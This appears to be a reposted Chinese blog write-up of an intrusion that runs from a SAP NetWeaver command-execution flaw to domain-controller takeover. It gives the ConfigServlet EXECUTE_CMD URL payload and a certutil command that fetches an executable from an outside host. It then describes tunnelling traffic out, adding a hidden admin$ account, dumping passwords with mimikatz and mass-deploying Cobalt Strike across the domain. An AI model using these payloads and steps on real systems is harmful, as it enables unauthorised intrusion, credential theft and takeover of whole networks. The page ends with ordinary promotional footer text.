记一次命令执行到内网渗透拿下域控

共 2103字,需浏览 5分钟

 ·

2021-06-28 13:53

👇👇关注后回复 “进群” ,拉你进程序员交流群👇👇


文章来源丨潇湘信安

https://www.xljtj.com/archives/ad.html


目标站采用SAP NetWeaver是SAP的集成平台,SAP命令执行payload为网址+命令。


Windows执行:
http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd /c net user

Linux执行:

http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id

由于提前得知目标为Windows机器,直接在目标网站执行net user,得到如下结果


查看当前用户,权限以及网络信息



得到当前用户sapxxx为administrator权限,同时为内网机器,那么就可以直接执行Windows自带的下载命令,来下载一个狗洞,用来转发流量。


当然你可以直接执行比如CS、MSF、以及你自己的远控等等,但是要考虑免杀问题,就用狗洞来操作。


Windows下载命令:

certutil -urlcache -split -f http://8.8.8.8/test.exe C:\test.exe

下载好之后,首先要用狗洞服务端在你自己外网服务器打开一个监听功能,目标机器执行上线命令,然后等待上线

成功上线后,自己电脑连接狗洞,出现此提示为连接成功,之后用代理软件,比如Proxifier或者Sockscap等工具代理本机127.0.0.1 8088端口


然后用命令执行去添加一个管理权限的用户,根据上面ipconfig得到的内网ip:10.85.x.x,直接连接其3389,成功添加账号admin$,直接登陆成功


在这里友情提示下,内网中存在域时,登陆账号要选择当前域计算机用户去登陆,不然会登陆不上

执行查询域管机命令发现没权限,然后用猕猴桃抓取一下本机账号密码,


使用administxxx账号,ATxxx域去登陆,查询域管机与域管用户

巧了不是,直接用得到的ATxxx\Administxxx去登陆SRV-DC-xx或者SRV-MAIN-xx,ping SRV-DC-xx和SRV-MAIN-xx得到ip


登录后


既然内网机器并无杀软,那么尝试上一个cs批量上线吧,搭建好cs服务端,直接生成文件在域控机上执行,等待机器上线后,右键执行猕猴桃,或者转储hash,让他自动获取密码

然后执行net view或者arp -a来获取目标ip

然后到目标处随便框选几台机器,当然你也可以全部选择,右键,登陆

然后选择你刚才搞出来的账号密码,选择一个监听器,坐等机器上线即可


最后给各位大佬比心,PS: 有指教请您留言

如侵权请私聊公众号删文

-End-

最近有一些小伙伴,让我帮忙找一些 面试题 资料,于是我翻遍了收藏的 5T 资料后,汇总整理出来,可以说是程序员面试必备!所有资料都整理到网盘了,欢迎下载!

点击👆卡片,关注后回复【面试题】即可获取

在看点这里好文分享给更多人↓↓

浏览 31
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报